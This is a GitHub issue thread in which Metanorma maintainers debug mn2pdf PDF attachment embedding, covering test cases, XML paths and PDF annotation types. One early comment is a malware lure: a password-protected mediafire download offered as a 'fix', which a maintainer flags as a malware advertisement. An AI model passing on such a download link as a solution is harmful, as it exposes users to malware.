### ISSUE TITLE
mn2pdf crashes in Docker container when creating attachments

### ISSUE THREAD

**Issue by petervwyatt** [metanorma/metanorma#407]
mn2pdf crashes when using the latest Metanorma Docker container when attempting to create PDF with attachments using `>docker run -v "%cd%":/metanorma/ -w /metanorma metanorma/metanorma metanorma site generate --agree-to-terms`. 

See attached console log output (starts with a Docker pull to ensure latest updates): [mn2pdf-crash-docker.txt](https://github.com/user-attachments/files/16755894/mn2pdf-crash-docker.txt). It appears the attachment files are not in the correct location inside the Docker container.

I'm unable to add you to our repo so for now here is a ZIP of the repo, including `_site` output. Note that both the HTML and HTML-alt flavour outputs are good and the attachments work fine. Issue appears to be only the PDF generation using mn2pdf.

[32000-2-2020-amd1.zip](https://github.com/user-attachments/files/16755908/32000-2-2020-amd1.zip)

The MN output type is for an ISO Amendment-style PDF with 2 attachments (a PDF and an XLSX)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ronaldtse** [comment]
Thanks @petervwyatt for the report.

(I can't believe that someone already tried to hijack this ticket with an malware advertisement 😰 )

**Comment by Intelligent2013** [comment]
I'm able to repeat the issue.
#### Docker
`docker run -v "%cd%":/metanorma/ -w /metanorma metanorma/metanorma metanorma site generate --agree-to-terms`

internal `mn2pdf` command line:
`java -Xss10m -Xmx3g -Djava.awt.headless=true -Duser.home=/root -jar /usr/local/bundle/gems/mn2pdf-1.96/lib/../bin/mn2pdf.jar --xml-file "/tmp/32000-2-2020-amd120240827-1-51ye2y.xml" --xsl-file "/usr/local/bundle/gems/metanorma-iso-2.8.4/lib/isodoc/iso/iso.amendment.xsl" --pdf-file "/metanorma/_site/documents/source/32000-2-2020-amd1.pdf" --param baseassetpath="/metanorma/source" --syntax-highlight  --font-manifest "/tmp/fontist_locations20240827-1-ri9kqm.yml"`

Error:
```
[mn2pdf] Caused by: java.io.FileNotFoundException: /tmp/_32000-2-2020-amd1_attachments/ISO32000-2_AnnexL_matrix-version072024.pdf (No such file or directory)
```

#### Local run
`bundle exec metanorma site generate --agree-to-terms`

internal `mn2pdf` command line:
`java -Xss10m -Xmx3g -Djava.awt.headless=true -Duser.home=C:/Users/TestUser -jar C:/tools/ruby31/lib/ruby/gems/3.1.0/gems/mn2pdf-1.97/bin/mn2pdf.jar --xml-file "C:/Users/TestUser/AppData/Local/Temp/32000-2-2020-amd120240827-4956-5u8a7c.xml" --xsl-file "C:/tools/ruby31/lib/ruby/gems/3.1.0/gems/metanorma-iso-2.8.4/lib/isodoc/iso/iso.amendment.xsl" --pdf-file "D:/Work/Metanorma/XML/ISO/ISO210_Docker/_site/documents/source/32000-2-2020-amd1.pdf" --param baseassetpath="D:/Work/Metanorma/XML/ISO/ISO210_Docker/source" --syntax-highlight  --font-manifest "C:/Users/TestUser/AppData/Local/Temp/fontist_locations20240827-4956-4pb97k.yml"`

Another error:
```
[mn2pdf] Element "pdf:embedded-file" is missing required property "name"! (No context info available)
[mn2pdf] org.apache.fop.fo.ValidationException: Element "pdf:embedded-file" is missing required property "name"! (No context info available)
[mn2pdf] javax.xml.transform.TransformerException: org.apache.fop.fo.ValidationException: Element "pdf:embedded-file" is missing required property "name"! (No context info available)
```

I'll investigate it.

**Comment by Intelligent2013** [comment]
The PDF generation fails if:
- the parameter `:data-uri-attachment: false` in `32000-2-2020-amd1.adoc` 
and/or 
- run `metanorma site generate --agree-to-terms`.

The PDF generates successfully only by the command:
```
bundle exec metanorma -t iso -x pdf source/32000-2-2020-amd1.adoc
```
and when the line `:data-uri-attachment: false` is commented.

@opoudjis could you clarify what is the correct way to use the attachment mechanism/links?

Let's take a simple test document with attachments:  [AttachmentsTests.zip](https://github.com/user-attachments/files/16762550/AttachmentsTests.zip)

## Test cases

### Test case 1 (PDF generation - failed)
- `:data-uri-attachment: false`
- `bundle exec metanorma -t iso -x pdf test_attachments.adoc`
- internal command line parameters for `mn2pdf`:
   - `--xml-file "C:/Users/TestUser/AppData/Local/Temp/test_attachments20240827-16576-svsw6c.xml"`
   - `--pdf-file "D:/Work/Metanorma/XML/ISO/ISO211_AttachmentsTests/test_attachments.pdf"`
- `test_attachments.presentation.xml`:
   - no element `/iso-standard/metanorma-extension/attachment`
   - `<link target="_test_attachments_attachments/program.c">sources/program.c</link>`

### Test case 2 (PDF generation - OK)
- `//:data-uri-attachment: false`
- `bundle exec metanorma -t iso -x pdf test_attachments.adoc`
- internal command line parameters for `mn2pdf`:
   - `--xml-file "C:/Users/TestUser/AppData/Local/Temp/test_attachments20240827-9616-vqk14b.xml"`
   - `--pdf-file "D:/Work/Metanorma/XML/ISO/ISO211_AttachmentsTests/test_attachments.pdf"`
- `test_attachments.presentation.xml`:
   - element `/iso-standard/metanorma-extension/attachment`: `<attachment name="_test_attachments_attachments/program.c">data:text/x-csrc;base64,I2luY2x1...</attachment>`
    - `<link target="_test_attachments_attachments/program.c">sources/program.c</link>`
Note: in this case there is an unambiguous match between `/iso-standard/metanorma-extension/attachment/@name` and `link/@target`.

### Test case 3 (PDF generation - failed)
- `:data-uri-attachment: false`
- `bundle exec metanorma site generate --agree-to-terms`
- internal command line parameters for `mn2pdf`:
    - `--xml-file "C:/Users/IntlUser/AppData/Local/Temp/test_attachments20240827-12940-4xeprw.xml"`
    - `--pdf-file "D:/Work/Metanorma/XML/ISO/ISO211_AttachmentsTests/_site/documents/test_attachments.pdf"`
    - `--param baseassetpath="D:/Work/Metanorma/XML/ISO/ISO211_AttachmentsTests"`
- `test_attachments.presentation.xml`:
   - no element `/iso-standard/metanorma-extension/attachment`
   - `<link target="_test_attachments_attachments/program.c">sources/program.c</link>`

### Test case 4 (PDF generation - OK _partially_, `source.c` attached, but links in the text opens external file from the disk)
- `//:data-uri-attachment: false`
- `bundle exec metanorma site generate --agree-to-terms`
- internal command line parameters for `mn2pdf`:
    - `--xml-file "C:/Users/IntlUser/AppData/Local/Temp/test_attachments20240827-14276-yrccg7.xml"
    - `--pdf-file "D:/Work/Metanorma/XML/ISO/ISO211_AttachmentsTests/_site/documents/test_attachments.pdf"`
    - `--param baseassetpath="D:/Work/Metanorma/XML/ISO/ISO211_AttachmentsTests"`
- `test_attachments.presentation.xml`:
   - element `/iso-standard/metanorma-extension/attachment`: `<attachment name="_site/documents/_test_attachments_attachments/program.c">data:text/x-csrc;base64,I2luY2x`
   - `<link target="_test_attachments_attachments/program.c">sources/program.c</link>`
Note: in this case there isn't an unambiguous match between `/iso-standard/metanorma-extension/attachment/@name` and `link/@target`.


Note 1: the input XML for `mn2pdf` in the temporarily folder always.
Note 2: the parameter `baseassetpath` pass in the `site generate` mode only.

Main question are:
- how to determine the source file for the attachments in TC1 and TC3?
- how to determine the link between `link/@target` and attachment name in TC1, TC3 and TC4?

**Comment by petervwyatt** [comment]
For TC4, the type of PDF annotation generated is incorrect.

It is currently a Link annotation (`/Subtype /Link` supporting a URI via the `/A` (Action) key) whereas it should likely be a File Attachment annotation (`/Subtype /FileAttachment` with `/FS` entry to an embedded file object). Although technically an Embedded GoTo action is possible using the current Link annotation (by changing the `/A`' entry), I'm not sure how widely supported that feature is in browser-based PDF viewers and the less widely used PDF viewers.

![image](https://github.com/user-attachments/assets/81d62819-aa14-40f2-a2d1-acd41ea5e2a5)

**Comment by opoudjis** [comment]
https://www.metanorma.org/author/topics/sections/attachments/

> By default, attachments are binary-encoded within the Metanorma XML file, just as with images. If the references to attachments are to be kept as file references in the XML file, set the document attribute `data-uri-attachment: false`.

What's happening is that if data-uri-attachment is false, the attachments are not embedded in the XML, but left as external file references. @Intelligent2013 that is legitimate (in case the files to be attached are huge, for example), and in that case, there will be no attachments folder. There is no embedding in HTML, which is why the output is the same: the files are where the HTML expects to see them.

So question back for you:

* How should I signal to you that the link is to be treated as an attachment? Should I put an attribute on the `link`, to tell you to embed the file being linked to?
* Should we allow linking as opposed to embedding as an option, or presuppose that if a file is an attachment, it should always be treated as embedded in PDF?

**Comment by opoudjis** [comment]
I am, correctly I think, fixing the hyperlink so it is now: 

````
<link target="sources/program.c">sources/program.c</link>
````

but that is crashing the PDF conversion:

````
Caused by: org.apache.fop.render.intermediate.IFException: Error adding embedded file: file:////var/folders/st/02jjnpwd1bz15gp_7m7fm1lr0000gs/T/sources/program.c
	at org.apache.fop.render.pdf.PDFDocumentHandler.handleExtensionObject(PDFDocumentHandler.java:333)
	at org.apache.fop.render.intermediate.util.IFDocumentHandlerProxy.handleExtensionObject(IFDocumentHandlerProxy.java:192)
	at org.apache.fop.render.intermediate.IFRenderer.processOffDocumentItem(IFRenderer.java:325)
	... 29 more
Caused by: java.io.FileNotFoundException: /var/folders/st/02jjnpwd1bz15gp_7m7fm1lr0000gs/T/sources/program.c (No such file or directory)
````

Of course, @Intelligent2013, you don't know to copy the linked-to files to the temp directory, so if you're working in a temp directory, you won't find them there. I assume again that, if I signal their use as attachments through an attribute on `link`, you will know to copy it across.

**Comment by opoudjis** [comment]
My suspicion is that TC4 will go away once we signal that the link is to an attachment, so that you will know what to do with it.

I'm going to go ahead and insert `<link attachment="true">` in the Presentation XML.

**Comment by ronaldtse** [comment]
I would like to point out that some considerations here are separate:

1. The Metanorma XML can contain:
    * Embedded attachments
    * External file linked attachments
2. PDF can contain:
    * Attachments embedded as PDF attachments
    * Attachments linked as external files
3. HTML can contain:
    * Attachments linked as external files

These are separate considerations and are actually orthogonal/unrelated to each other.

**Comment by opoudjis** [comment]
These introduce yet more abstruse complications in fragile code. 

You can always link to an external file as an external file using `link:[]` with a file:/// link, without needing to recourse to attachments. If things are to be linked as external files, you shouldn't be using the attachments functionality to begin with. The use case of bundling local files with a document should be addressed with a file manifest, not with attachments, as you have already proposed to address with capsium. 

1 is already catered for. 3 is not legitimate: if an attachment turns up in code, it can only be rendered as an external file, and that's already being done. The only legitimate distinction to make (and I question that) is whether to extract attachments into PDF as external files, or as embeddings. This should not be done on a link-by-link basis: this is a Presentation XML level directive, to be passed on to the PDF generation, applying to the entire document.

**Comment by opoudjis** [comment]
The Presentation XML is now:

````
<title depth="1">1<tab/>Scope</title>
<p id="_dd6b68dd-d5c3-4bc8-5146-4d38e84631eb">The sample C program: <link attachment="true" target="sources/program.c">sources/program.c</link></p>
</clause>


</sections><bibliography><references id="_bibliography" normative="false" obligation="informative" hidden="true" displayorder="4">
<title depth="1">Bibliography</title><bibitem id="file1" hidden="true">
  <formattedref format="application/x-isodoc+xml">[NO INFORMATION AVAILABLE]</formattedref>
  <uri type="attachment">sources/program.c</uri>
  <uri type="citation">sources/program.c</uri>
  <docidentifier type="metanorma">[sources/program.c]</docidentifier>
</bibitem>
````

@Intelligent2013 I'm attaching the generated Presentation XML for  `:data-uri-attachment: false`. Let me know if the `link/@attachment` deals with the issue of no `attachment` being embedded into the document, and whether we can make the embedding or linking of attachments into PDFs a config option.

[test_attachments.presentation.xml.zip](https://github.com/user-attachments/files/16783605/test_attachments.presentation.xml.zip)

**Comment by Intelligent2013** [comment]
> I'm attaching the generated Presentation XML for `:data-uri-attachment: false`. Let me know if the `link/@attachment` deals with the issue of no `attachment` being embedded into the document, 

@opoudjis thank you for the update. I'll try it. I think `link/@attachment` should solve the issue. But looks like we need to pass `--param baseassetpath=...` (`mn2pdf-ruby`) in all cases, not only for `metanorma site generate` mode. Because `target="sources/program.c">` points to the folder `sources` in the source adoc folder, but XML really found in the temp folder, and `mn2pdf` doesn't know anything about the source adoc folder. See TC1 and TC2 without `baseassetpath`.

> and whether we can make the embedding or linking of attachments into PDFs a config option.

I think if the file determined in the Bibliography as attachment, then it means unambiguously that this file should be embedded internally in the PDF. External link isn't the attachment, it just the link to the external file. So no need additional config option.

**Comment by opoudjis** [comment]
> But looks like we need to pass --param baseassetpath=... (mn2pdf-ruby) in all cases, not only for metanorma site generate mode. Because target="sources/program.c"> points to the folder sources in the source adoc folder, but XML really found in the temp folder, and mn2pdf doesn't know anything about the source adoc folder. See TC1 and TC2 without baseassetpath.

**Comment by Intelligent2013** [comment]
> [test_attachments.presentation.xml.zip](https://github.com/user-attachments/files/16783605/test_attachments.presentation.xml.zip)

@opoudjis I've tested and it's ok for me. Thanks.


> Done, try with PR.

Yes, `baseassetpath` is passing via cmd, but the attachment paths in the Presentation XML starts with `_test_attachments_attachments/`, not `source/`:

```xml
                   <p id="_dd6b68dd-d5c3-4bc8-5146-4d38e84631eb">The sample C program: <link attachment="true" target="_test_attachments_attachments/program.c">sources/program.c</link>
....
			<bibitem id="file1" hidden="true">
				<formattedref format="application/x-isodoc+xml">[NO INFORMATION AVAILABLE]</formattedref>
				<uri type="attachment">_test_attachments_attachments/program.c</uri>
				<uri type="citation">_test_attachments_attachments/program.c</uri>
				<docidentifier type="metanorma">[sources/program.c]</docidentifier>
			</bibitem>

```


My `Gemfile`:
```
source "https://rubygems.org"

gem "metanorma-cli"

gem "isodoc", git: "https://github.com/metanorma/isodoc", branch: "fix/attachments-unembedded"
```

**Comment by Intelligent2013** [comment]
@opoudjis sorry, I've forgotten to add:
```
gem "metanorma-standoc", git: "https://github.com/metanorma/metanorma-standoc", branch: "fix/attachments-unembedded"
```

**Comment by Intelligent2013** [comment]
I'll continue the testing tomorrow.

**Comment by Intelligent2013** [comment]
@opoudjis I can't generate the correct Presentation XML by the command `bundle exec metanorma site generate --agree-to-terms`.



- TC3 - the Presentation XML contains full path, but `mn2pdf` tries to concatenate `baseassetpath` command-line parameter (`D:/Work/Metanorma/XML/ISO/ISO213_Attachment`) and `link/@target` (`D:/Work/Metanorma/XML/ISO/ISO213_Attachment/sources/program.c`):
```xml
<p id="_">The sample C program: <link attachment="true" target="D:/Work/Metanorma/XML/ISO/ISO213_Attachment/sources/program.c">sources/program.c</link>
</p>
...
<bibitem id="file1" hidden="true">
	<formattedref format="application/x-isodoc+xml">[NO INFORMATION AVAILABLE]</formattedref>
	<uri type="attachment">D:/Work/Metanorma/XML/ISO/ISO213_Attachment/sources/program.c</uri>
	<uri type="citation">D:/Work/Metanorma/XML/ISO/ISO213_Attachment/sources/program.c</uri>
	<docidentifier type="metanorma">[sources/program.c]</docidentifier>
</bibitem>
```

- TC4 - `attachment/@name` and `link/@target` are different:
```xml
		<attachment name="_site/documents/_test_attachments.tc4_attachments/program.c">data:text/x-csrc;base64,I2luY2x...
</attachment>
...
			<p id="_dd6b68dd-d5c3-4bc8-5146-4d38e84631eb">The sample C program: <link attachment="true" target="_test_attachments.tc4_attachments/program.c">sources/program.c</link>
```
May be I have to ignore the element `//metanorma-extension/attachment` in all cases and attach the files based bibitem with `<uri type="attachment"`?

Source example:
[attachments_tc3_tc4.zip](https://github.com/user-attachments/files/16798802/attachments_tc3_tc4.zip)

`Gemfile`:
```
source "https://rubygems.org"

gem "metanorma-cli"

gem "isodoc", git: "https://github.com/metanorma/isodoc", branch: "main"

gem "metanorma-standoc", git: "https://github.com/metanorma/metanorma-standoc", branch: "main"
```

**Comment by opoudjis** [comment]
Windows special processing, it's not recognising D:/Work/Metanorma/XML/ISO/ISO213_Attachment/sources/program.c as absolute. Surprised, but I'll fix it.

**Comment by opoudjis** [comment]
So, attachment_uri needs to be forced to be relative to the output directory, given that it can be prefixed by baseassetpath; it currently isn't.

**Comment by opoudjis** [comment]
@Intelligent2013 I've got it now doing:

````
><bibitem id="file1" hidden="true">
  <formattedref format="application/x-isodoc+xml">[NO INFORMATION AVAILABLE]</formattedref>
  <uri type="attachment">../../sources/program.c</uri>
  <uri type="citation">../../sources/program.c</uri>
  <docidentifier type="metanorma">[sources/program.c]</docidentifier>
</bibitem>
````

Which is what you would expect: the file is in _site/documents/test_attachments.presentation.xml, and the attachment is in sources/program.c, so _site/documents/../../sources/program.c takes you to the file.

But it's crashing:

````
Caused by: java.io.FileNotFoundException: /var/folders/st/02jjnpwd1bz15gp_7m7fm1lr0000gs/T/../../sources/program.c (No such file or directory)
````

I don't understand why it's looking for it there.

I'll normalise TC4 later.

**Comment by Intelligent2013** [comment]
> But it's crashing:
> 
> ```
> Caused by: java.io.FileNotFoundException: /var/folders/st/02jjnpwd1bz15gp_7m7fm1lr0000gs/T/../../sources/program.c (No such file or directory)
> ```
> 
> I don't understand why it's looking for it there.

@opoudjis 1. to be on the same page, please make sure that you're using the latest `mn2pdf` `v1.98` and latest `metanorma-iso` XSLT.
2.  does the `--param baseassetpath="..."` point to the input adoc folder or somewhere else?

**Comment by opoudjis** [comment]
Did some repulling. It is now pointing to the input adoc folder; the thing is though, that I'm generating the attachment now relative to the *output* folder, _site/attachments; and that's wrong, the attachments, if not embedded, have to be presumed to be relative to the input folder. Fixing.

**Comment by opoudjis** [comment]
TC 3 works.

TC 4: still has:

````
<attachment name="_site/documents/_test_attachments_attachments/program.c">

<link target="_test_attachments_attachments/program.c">
````

They need to be the same. In this case, `link/@target` needs to be updated to be the same as `attachment/@name`, which is correct.

**Comment by opoudjis** [comment]
@Intelligent2013 I think I've now addressed it. Please retest

**Comment by Intelligent2013** [comment]
> @Intelligent2013 I think I've now addressed it. Please retest

@opoudjis it's working now. Thanks!

> mn2pdf crashes when using the latest Metanorma Docker container

@petervwyatt the issue fixed and I hope the updated Metanorma Docker container will be available on the next week.
Or the latest update for non-docker running can be obtained with this `Gemfile`:
```
source "https://rubygems.org"

gem "metanorma-cli"
gem "isodoc", git: "https://github.com/metanorma/isodoc", branch: "main"
gem "metanorma-standoc", git: "https://github.com/metanorma/metanorma-standoc", branch: "main"
```
then `bundle update`.




> For TC4, the type of PDF annotation generated is incorrect.
> 
> It is currently a Link annotation (`/Subtype /Link` supporting a URI via the `/A` (Action) key) whereas it should likely be a File Attachment annotation (`/Subtype /FileAttachment` with `/FS` entry to an embedded file object). Although technically an Embedded GoTo action is possible using the current Link annotation (by changing the `/A`' entry), I'm not sure how widely supported that feature is in browser-based PDF viewers and the less widely used PDF viewers.

This is how the Apache FOP is working (the source code https://github.com/apache/xmlgraphics-fop/blob/c11f43c9dbf529b87820d77ef501aa10699fc9d8/fop-core/src/main/java/org/apache/fop/pdf/PDFFactory.java#L699)
Apache FOP add JavaScript action to open the embedded file:

PDFBox PDFDebugger:
![image](https://github.com/user-attachments/assets/e96b68d7-4a58-4b37-80b7-735c7e3f467a)

Adobe Acrobat:
![image](https://github.com/user-attachments/assets/10c01dc1-ba54-4bd2-a919-698ea6f23f1d)

@ronaldtse should I deep dive into Apache FOP sources and try to use `Subtype` `/FileAttachment` to fit the PDF Reference?

From PDF Reference 1.7:
![image](https://github.com/user-attachments/assets/69cf935a-aa93-4eeb-bdbf-59ba927c974c)

![image](https://github.com/user-attachments/assets/62374082-18f6-4c03-827b-3cba0e3cd647)

**Comment by ronaldtse** [comment]
@Intelligent2013 yes, please do as according to @petervwyatt , as he is the chief editor of the PDF standard itself 😉

**Comment by petervwyatt** [comment]
@Intelligent2013, @opoudjis - thanks for fixing, but I'll wait for the Docker container as I have several MN docs I'm working with and juggling Gems sounds painful.

Like programming language features, PDF has several different methods for embedding a file. Let me skim the FOP code and see if I can understand what option(s) they support - and if they support it correctly.

@ronaldtse - does MN ever want to generate PDF/A (ISO 19005 - archiving), PDF/X (ISO 15930 - professional printing) and/or PDF/UA (accessibility) compliant PDFs? These "subset" standards impose some additional requirements on embedded files so would be good to not go down a dead end if you have future plans or requirements.

**Comment by ronaldtse** [comment]
@CAMOBAP doesn't the Docker container to work with Git gems? i.e. we don't need to re-build the Docker container to work with the latest Gemfile?

@petervwyatt yes we would certainly wish to adopt your suggestions: perhaps this is something we can discuss in a separate ticket?

**Comment by CAMOBAP** [comment]
> @CAMOBAP doesn't the Docker container to work with Git gems? i.e. we don't need to re-build the Docker container to work with the latest Gemfile?

@ronaldtse  It does let me know if all required gems are released I can initiate update for `latest` images

**Comment by ronaldtse** [comment]
@CAMOBAP the problem is that those relevant gems are not released, but just specified as Git gems in the Gemfile. I thought our container supports Git gem.

**Comment by CAMOBAP** [comment]
@ronaldtse for sure, any gems except mn2pdf?, BTW mn2pdf was released 2 days ago, do we really need one from git?

**Comment by ronaldtse** [comment]
@CAMOBAP we don't need to use the mn2pdf Git gem, it is only when there is a Gemfile. Let me link you to that issue:

* https://github.com/metanorma/mn-samples-plateau/issues/166

**Comment by Intelligent2013** [comment]
@petervwyatt thank you for your comments. We use `pdf:embedded-file` already for the embedding a file into the PDF, but without the description. We'll add it.

> FOP 2.9 also goes on to discuss `fo:basic-link` - I think this must be what MN is using now (possibly only using???) since the somewhat vague description describes PDF targets and actions. I recommend **NOT** doing this

Apache FOP provides only `fo:basic-link` mechanism for the reference to the embedded file. But I plan to try to customize this behavior via modifying the Apache FOP sources.

**Comment by petervwyatt** [comment]
For a PDF File Attachment annotation, see ISO 32000-2:2020, 12.5.6.15 ([no-cost copy available here](https://pdfa.org/sponsored-standards/)) you will need to do the following (this is a combination of PDF and PDF/A-3 requirements!): 
* `/Type/Annot /Subtype/FileAttachment`
* in the annotation dictionary `/FS` references a file specification dictionary which needs to contain an `/EF` entry that itself has `/F` and `/UF` entries referencing the embedded file stream object. Ideally '/Desc' should be present too.
* the embedded file stream object dictionary needs to have its `/Subtype' set to the IANA (MIME) media type
* ideally the embedded file stream object dictionary also needs to have a '/Params' dictionary with '/ModDate' (_this is technically optional in PDF/A-3 but is required by PDF/A-4_)
* you will need to make sure that the annotation has an appearance stream (`/AP`) and flags (`/F`) set appropriately.
